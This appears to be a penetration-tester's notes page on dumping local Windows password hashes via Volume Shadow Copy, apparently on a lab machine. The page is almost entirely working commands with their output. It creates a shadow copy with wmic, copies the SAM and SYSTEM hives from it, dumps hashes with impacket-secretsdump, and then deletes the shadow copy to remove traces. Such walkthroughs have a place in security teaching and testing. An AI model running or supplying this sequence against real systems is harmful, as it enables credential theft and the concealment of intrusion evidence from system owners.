Shadow Copy
With elevated privilege
C:\>wmic shadowcopy call create Volume='C:\'
Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 0;
ShadowID = "{454E3F18-B0D8-4C7B-891D-439E9F773ADF}";
};List the existing shadow volumes with list shadows:
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Contents of shadow copy set ID: {869a05c9-8b82-48dd-845a-d3f952550802}
Contained 1 shadow copies at creation time: 4/2/2024 2:42:56 PM
Shadow Copy ID: {454e3f18-b0d8-4c7b-891d-439e9f773adf}
Original Volume: (C:)\\?\Volume{7daad430-ba07-41f6-9abe-8ce956f64e22}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: WST2.vulnableone.local
Service Machine: WST2.vulnableone.local
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers, DifferentialShadow copying the SAM database
C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM C:\Users\sieng.chantrea\Desktop\SAM
1 file(s) copied.
C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\Users\sieng.chantrea\Desktop\SYSTEM
1 file(s) copied.Dumping the hash
└─$ impacket-secretsdump -sam sam -system system localDeleting shadow copy
C:\>vssadmin Delete Shadows /Shadow={454e3f18-b0d8-4c7b-891d-439e9f773adf}
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Do you really want to delete 1 shadow copies (Y/N): [N]? Y
Successfully deleted 1 shadow copies.
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
No items found that satisfy the query.Last updated